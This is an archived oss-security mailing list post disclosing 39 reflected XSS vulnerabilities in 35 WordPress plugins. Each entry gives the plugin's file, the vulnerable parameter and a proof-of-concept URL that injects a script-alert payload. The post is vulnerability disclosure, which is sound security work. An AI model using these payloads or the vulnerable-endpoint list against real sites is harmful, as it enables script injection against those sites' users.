Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Wed, 13 Apr 2016 08:34:05 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: oss-security@...ts.openwall.com
Subject: Re: 39 XSS vulnerabilities in 35 wordpress plugins.

Hello List,

This was meant to be s/CVE/DWF/g thanks Henri for catching that.

-- Larry


> On Apr 12, 2016, at 8:48 AM, Larry W. Cashdollar <larry0@...com> wrote:
> 
> Hello List,
> 
> 
> This was a project I worked on as part of my research in Akamai's SIRT, I initially found 1352 suspect XSS vulnerabilities but Wordpress escapes super globals GET/POST/REQUEST
> https://core.trac.wordpress.org/ticket/18322.  I didn't know this at the time, so now I have a database of vulnerabilities that are context dependent and would need to be examined
> individually.  I managed to automate XSS testing against the database and of 1352 39 successfully executed javascript.  These are those 39, I've manually verified they're still vulnerable.
> 
> They're available here http://www.vapidlabs.com/wp/wp.php
> 
> I notified Wordpress back in February of my research.
> 
> 
> Plugin:https://wordpress.org/plugins/mousewheel-smooth-scroll File:./mousewheel-smooth-scroll/js/wpmss.php Parameter:ease  speed step CVE-2016-77447 PoC:hxxp://[target]/wp-content/plugins/mousewheel-smooth-scroll/js/wpmss.php?step="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/indexisto File:./indexisto/assets/js/indexisto-inject.php Parameter:indexisto_index CVE-2016-77360 PoC:hxxp://[target]/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/prettypre File:./prettypre/prettyprecss.php Parameter:ts CVE-2016-77548 PoC:hxxp://[target]/wp-content/plugins/prettypre/prettyprecss.php?ts="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/whizz File:./whizz/plugins/delete-plugin.php Parameter:plugin CVE-2016-77799 PoC:hxxp://[target]/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/mypuzzle-jigsaw File:./mypuzzle-jigsaw/getGallery.php Parameter:callback CVE-2016-77465 PoC:hxxp://[target]/wp-content/plugins/mypuzzle-jigsaw/getGallery.php?callback="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/anti-plagiarism File:./anti-plagiarism/js.php Parameter:m CVE-2016-77035 PoC:hxxp://[target]/wp-content/plugins/anti-plagiarism/js.php?m="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/qoate-scroll-triggered-box File:./qoate-scroll-triggered-box/assets/js/script.php Parameter:anim perc sac vpos CVE-2016-77559 PoC:hxxp://[target]/wp-content/plugins/qoate-scroll-triggered-box/assets/js/script.php?anim="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/s3-video File:./s3-video/views/video-management/preview_video.php Parameter:media CVE-2016-77600 PoC:hxxp://[target]/wp-content/plugins/s3-video/views/video-management/preview_video.php?media="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/wpsolr-search-engine File:./wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php Parameter:page  tab CVE-2016-77958 PoC:hxxp://[target]/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/page-layout-builder File:./page-layout-builder/includes/layout-settings.php Parameter:layout_settings_id CVE-2016-77503 PoC:hxxp://[target]/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/mypuzzle-sliding File:./mypuzzle-sliding/getGallery.php Parameter:callback CVE-2016-77466 PoC:hxxp://[target]/wp-content/plugins/mypuzzle-sliding/getGallery.php?callback="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/e-search File:./e-search/tmpl/date_select.php Parameter:date-from date-to CVE-2016-77217 PoC:hxxp://[target]/wp-content/plugins/e-search/tmpl/date_select.php?date-from="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/e-search File:./e-search/tmpl/title_az.php Parameter:title_az CVE-2016-77217 PoC:hxxp://[target]/wp-content/plugins/e-search/tmpl/title_az.php?title_az="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/tidio-gallery File:./tidio-gallery/popup-insert-help.php Parameter:galleryId id  tidio-gallery CVE-2016-77727 PoC:hxxp://[target]/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/parsi-font File:./parsi-font/css.php Parameter:font size CVE-2016-77506 PoC:hxxp://[target]/wp-content/plugins/parsi-font/css.php?size="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/defa-online-image-protector File:./defa-online-image-protector/redirect.php Parameter:r CVE-2016-77193 PoC:hxxp://[target]/wp-content/plugins/defa-online-image-protector/redirect.php?r="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/new-year-firework File:./new-year-firework/firework/index.php Parameter:music text url CVE-2016-77475 PoC:hxxp://[target]/wp-content/plugins/new-year-firework/firework/index.php?text="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/simpel-reserveren File:./simpel-reserveren/edit.php Parameter:page CVE-2016-77628 PoC:hxxp://[target]/wp-content/plugins/simpel-reserveren/edit.php?page="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/groupon-widget File:./groupon-widget/widget.css.php Parameter:grpn_wdgt_get_it_btn_background grpn_wdgt_link_color grpn_wdgt_price_tag_background grpn_wdgt_shell_background grpn_wdgt_text_color grpn_wdgt_title_color CVE-2016-77332 PoC:hxxp://[target]/wp-content/plugins/groupon-widget/widget.css.php?grpn_wdgt_shell_background="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/wp-notifications File:./wp-notifications/css/ln_livenotifications_css.php Parameter:banner_bgcolor dropdown_bit_bgcolor dropdown_bit_color dropdown_boder_color dropdown_color dropdown_hover_bgcolor dropdown_link_color CVE-2016-77885 PoC:hxxp://[target]/wp-content/plugins/wp-notifications/css/ln_livenotifications_css.php?dropdown_color="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/wp-latest-posts File:./wp-latest-posts/js/wpcufpn_front.js.php Parameter:id CVE-2016-77873 PoC:hxxp://[target]/wp-content/plugins/wp-latest-posts/js/wpcufpn_front.js.php?id="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/ajax-random-post File:./ajax-random-post/js.php Parameter:count interval CVE-2016-77022 PoC:hxxp://[target]/wp-content/plugins/ajax-random-post/js.php?interval="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/admin-font-editor File:./admin-font-editor/css.php Parameter:font size CVE-2016-77009 PoC:hxxp://[target]/wp-content/plugins/admin-font-editor/css.php?size="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/hdw-tube File:./hdw-tube/playlist.php Parameter:playlist CVE-2016-77337 PoC:hxxp://[target]/wp-content/plugins/hdw-tube/playlist.php?playlist="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/hdw-tube File:./hdw-tube/mychannel.php Parameter:channel CVE-2016-77337 PoC:hxxp://[target]/wp-content/plugins/hdw-tube/mychannel.php?channel="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/lbak-google-checkout File:./lbak-google-checkout/css/googlecheckout.php Parameter:ih iw ph pw tc CVE-2016-77395 PoC:hxxp://[target]/wp-content/plugins/lbak-google-checkout/css/googlecheckout.php?pw="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/razuna-media-manager File:./razuna-media-manager/pages/ajax/razuna-upload-callback.php Parameter:message responsecode CVE-2016-77577 PoC:hxxp://[target]/wp-content/plugins/razuna-media-manager/pages/ajax/razuna-upload-callback.php?responsecode="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/mypuzzle-find-the-pair-a-memory-game File:./mypuzzle-find-the-pair-a-memory-game/ftpair-getCardImages.php Parameter:callback CVE-2016-77464 PoC:hxxp://[target]/wp-content/plugins/mypuzzle-find-the-pair-a-memory-game/ftpair-getCardImages.php?callback="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/surveymonkey-button File:./surveymonkey-button/start_survey.php Parameter:jqueryPepPath CVE-2016-77702 PoC:hxxp://[target]/wp-content/plugins/surveymonkey-button/start_survey.php?jqueryPepPath="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/hero-maps-pro File:./hero-maps-pro/views/dashboard/index.php Parameter:p v CVE-2016-77341 PoC:hxxp://[target]/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/bbpress-social-network File:./bbpress-social-network/css/ln_livenotifications_css.php Parameter:banner_bgcolor dropdown_bit_bgcolor dropdown_bit_color dropdown_boder_color dropdown_color dropdown_hover_bgcolor dropdown_link_color CVE-2016-77074 PoC:hxxp://[target]/wp-content/plugins/bbpress-social-network/css/ln_livenotifications_css.php?dropdown_color="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/bbpress-social-network File:./bbpress-social-network/css/ln_livenotifications_cssback.php Parameter:banner_bgcolor dropdown_bgcolor dropdown_bit_bgcolor dropdown_bit_color dropdown_boder_color dropdown_color dropdown_hover_bgcolor dropdown_link_color CVE-2016-77074 PoC:hxxp://[target]/wp-content/plugins/bbpress-social-network/css/ln_livenotifications_cssback.php?dropdown_bgcolor="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/photoxhibit File:./photoxhibit/common/inc/pages/edit_styles.php Parameter:gid CVE-2016-77517 PoC:hxxp://[target]/wp-content/plugins/photoxhibit/common/inc/pages/edit_styles.php?gid="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/photoxhibit File:./photoxhibit/common/inc/pages/build.php Parameter:gid CVE-2016-77517 PoC:hxxp://[target]/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/pondol-formmail File:./pondol-formmail/pages/admin-mail-info.php Parameter:itemid CVE-2016-77532 PoC:hxxp://[target]/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/heat-trackr File:./heat-trackr/heat-trackr_abtest_add.php Parameter:id N  WPSLT CVE-2016-77339 PoC:hxxp://[target]/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/tidio-form File:./tidio-form/popup-insert-help.php Parameter:formId id  tidio-form CVE-2016-77726 PoC:hxxp://[target]/wp-content/plugins/tidio-form/popup-insert-help.php?formId="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/simplified-content File:./simplified-content/ooawpframework/js/ajax/OOAAjax.js.php Parameter:ajaxURL CVE-2016-77642 PoC:hxxp://[target]/wp-content/plugins/simplified-content/ooawpframework/js/ajax/OOAAjax.js.php?ajaxURL="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/infusionsoft File:./infusionsoft/Infusionsoft/examples/leadscoring.php Parameter:ContactId CVE-2016-77364 PoC:hxxp://[target]/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId="><script>alert(1);</script><"

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ